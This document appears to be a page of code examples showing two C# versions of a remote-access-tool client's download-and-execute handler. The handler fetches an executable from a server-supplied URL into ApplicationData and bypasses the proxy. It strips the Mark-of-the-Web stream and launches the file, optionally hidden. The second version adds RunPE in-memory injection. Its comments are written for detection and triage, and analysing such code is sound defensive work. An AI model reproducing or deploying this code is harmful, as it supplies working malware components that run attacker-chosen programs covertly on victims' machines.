Beispiel #1
        /// <summary>
        /// Handles a DownloadAndExecute packet: fetches the file at <c>command.URL</c> into the
        /// ApplicationData folder and starts it as a new process, issuing a Status packet at each stage.
        /// </summary>
        /// <param name="command">Packet supplying <c>URL</c> and <c>RunHidden</c>; both are used as received, no validation is visible in this block.</param>
        /// <param name="client">Passed to every <c>Status(...).Execute</c> call; presumably the connection the status is sent over (Execute is defined elsewhere).</param>
        /// <remarks>
        /// Behaviours visible in this block that matter for detection and triage: an .exe with a
        /// generated name written under the ApplicationData folder, an attempt to delete its
        /// Zone.Identifier stream, a download that does not use the configured proxy, and a child
        /// process that may be started with a hidden window.
        /// </remarks>
        public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
                                                           Client client)
        {
            new Packets.ClientPackets.Status("Downloading file...").Execute(client);

            // The work runs on its own thread, so this handler returns as soon as the thread is started.
            new Thread(() =>
            {
                // Target path: ApplicationData special folder plus a name from GetRandomFilename(12, ".exe")
                // (helper defined elsewhere; presumably a random 12-character name, confirm there).
                string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                               Helper.Helper.GetRandomFilename(12, ".exe"));

                try
                {
                    using (WebClient c = new WebClient())
                    {
                        // Proxy = null makes WebClient connect directly instead of through the default
                        // proxy, so an explicit web proxy will not see this request; network, DNS and
                        // endpoint telemetry are the places to look for it.
                        c.Proxy = null;
                        // The URL comes straight from the packet: no scheme/host check here and no hash
                        // or signature check on what was downloaded.
                        c.DownloadFile(command.URL, tempFile);
                    }
                }
                catch
                {
                    // Bare catch: every exception type ends the thread with the same generic status.
                    new Packets.ClientPackets.Status("Download failed!").Execute(client);
                    return;
                }

                new Packets.ClientPackets.Status("Downloaded File!").Execute(client);

                try
                {
                    // Targets the file's Zone.Identifier alternate data stream (the Windows
                    // Mark-of-the-Web) before launch. DeleteFile is defined elsewhere.
                    DeleteFile(tempFile + ":Zone.Identifier");

                    // Header check: throws only when BOTH bytes differ from 'M' and 'Z' (the condition
                    // uses &&), so a file with just one matching byte passes. A file shorter than two
                    // bytes throws on the index instead; both cases land in the catch below.
                    var bytes = File.ReadAllBytes(tempFile);
                    if (bytes[0] != 'M' && bytes[1] != 'Z')
                    {
                        throw new Exception("no pe file");
                    }

                    ProcessStartInfo startInfo = new ProcessStartInfo();
                    if (command.RunHidden)
                    {
                        startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                        startInfo.CreateNoWindow = true;
                    }
                    // UseShellExecute mirrors RunHidden: shell launch when hidden, direct process
                    // creation otherwise.
                    startInfo.UseShellExecute = command.RunHidden;
                    startInfo.FileName        = tempFile;
                    Process.Start(startInfo);
                }
                catch
                {
                    // Any failure after the download: the file is deleted and a generic status is sent.
                    DeleteFile(tempFile);
                    new Packets.ClientPackets.Status("Execution failed!").Execute(client);
                    return;
                }

                // Reached only when Process.Start did not throw.
                new Packets.ClientPackets.Status("Executed File!").Execute(client);
            }).Start();
        }
Beispiel #2
        /// <summary>
        /// Handles a DownloadAndExecute packet and dispatches on <c>command.Type</c>: "drop" writes
        /// the download to the ApplicationData folder and starts it as a process; "self" and "cmd"
        /// pass the downloaded bytes, Base64-encoded, to <c>RunPE.Invoke</c>. A Status packet is issued
        /// at each stage.
        /// </summary>
        /// <param name="command">Packet supplying <c>Type</c>, <c>URL</c> and <c>RunHidden</c>; all are used as received, no validation is visible in this block.</param>
        /// <param name="client">Passed to the Status, Download and RunPE calls; presumably the connection used for replies (those members are defined elsewhere).</param>
        /// <remarks>
        /// Detection-relevant behaviour visible here: in the "drop" branch an .exe with a generated
        /// name is written under the ApplicationData folder, its Zone.Identifier stream is targeted for
        /// deletion, the download does not use the configured proxy, and the child process may be
        /// hidden. The "self" and "cmd" branches do not reference a file path in this block.
        /// </remarks>
        public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
                                                           Client client)
        {
            new Packets.ClientPackets.Status("Downloading file...").Execute(client);

            // The work runs on its own thread, so this handler returns as soon as the thread is started.
            new Thread(() =>
            {
                try
                {
                    if (command.Type == "drop")
                    {
                        #region drop
                        // Target path: ApplicationData special folder plus a name from
                        // GetRandomFilename(12, ".exe") (helper defined elsewhere; presumably a random
                        // 12-character name, confirm there).
                        string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                                                       Helper.Helper.GetRandomFilename(12, ".exe"));

                        try
                        {
                            using (WebClient c = new WebClient())
                            {
                                // Proxy = null makes WebClient connect directly instead of through the
                                // default proxy, so an explicit web proxy will not see this request.
                                c.Proxy = null;
                                // URL is used as received; no integrity check on the downloaded file.
                                c.DownloadFile(command.URL, tempFile);
                            }
                        }
                        catch
                        {
                            // Bare catch: every exception type ends the thread with the same status.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                            return;
                        }

                        new Packets.ClientPackets.Status("Downloaded File!").Execute(client);

                        try
                        {
                            // Targets the file's Zone.Identifier alternate data stream (the Windows
                            // Mark-of-the-Web) before launch. DeleteFile is defined elsewhere.
                            DeleteFile(tempFile + ":Zone.Identifier");

                            // Header check: throws only when BOTH bytes differ from 'M' and 'Z' (the
                            // condition uses &&), so a file with one matching byte passes. A file
                            // shorter than two bytes throws on the index instead.
                            var bytes = File.ReadAllBytes(tempFile);
                            if (bytes[0] != 'M' && bytes[1] != 'Z')
                            {
                                throw new Exception("Not an .EXE file!");
                            }

                            ProcessStartInfo startInfo = new ProcessStartInfo();
                            if (command.RunHidden)
                            {
                                startInfo.WindowStyle    = ProcessWindowStyle.Hidden;
                                startInfo.CreateNoWindow = true;
                            }
                            // UseShellExecute mirrors RunHidden: shell launch when hidden, direct
                            // process creation otherwise.
                            startInfo.UseShellExecute = command.RunHidden;
                            startInfo.FileName        = tempFile;
                            Process.Start(startInfo);
                        }
                        catch (Exception ex)
                        {
                            // The file is deleted and the exception message is forwarded in the status.
                            DeleteFile(tempFile);
                            new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
                            return;
                        }
                        #endregion
                    }
                    else if (command.Type == "self")
                    {
                        // Download is defined elsewhere; the null check implies null signals failure.
                        byte[] fileBytes = Download(command.URL, client);
                        if (fileBytes == null)
                        {
                            // No return here: execution continues to Convert.ToBase64String(null), which
                            // throws ArgumentNullException, so the outer catch sends a second status.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                        }

                        // RunPE is defined elsewhere. NOTE(review): the name and arguments suggest the
                        // payload is run from memory rather than from a file; confirm in RunPE.
                        RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
                    }
                    else if (command.Type == "cmd")
                    {
                        byte[] fileBytes = Download(command.URL, client);
                        if (fileBytes == null)
                        {
                            // Same fall-through as the "self" branch: no return after the status.
                            new Packets.ClientPackets.Status("Download failed!").Execute(client);
                        }

                        // Same call as "self" but with arguments "sys" and "cmd"; presumably selects a
                        // different host process, confirm in RunPE.
                        RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
                    }
                    else
                    {
                        // Unrecognised Type: reported here, then control still reaches the
                        // "Executed File!" status after the try block because there is no return.
                        new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
                    }
                }
                catch (Exception ex)
                {
                    // Catches whatever the branches above let escape and forwards ex.Message.
                    new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
                    return;
                }
                // Sent whenever no branch returned or threw, including the unknown-Type branch.
                new Packets.ClientPackets.Status("Executed File!").Execute(client);
            }).Start();
        }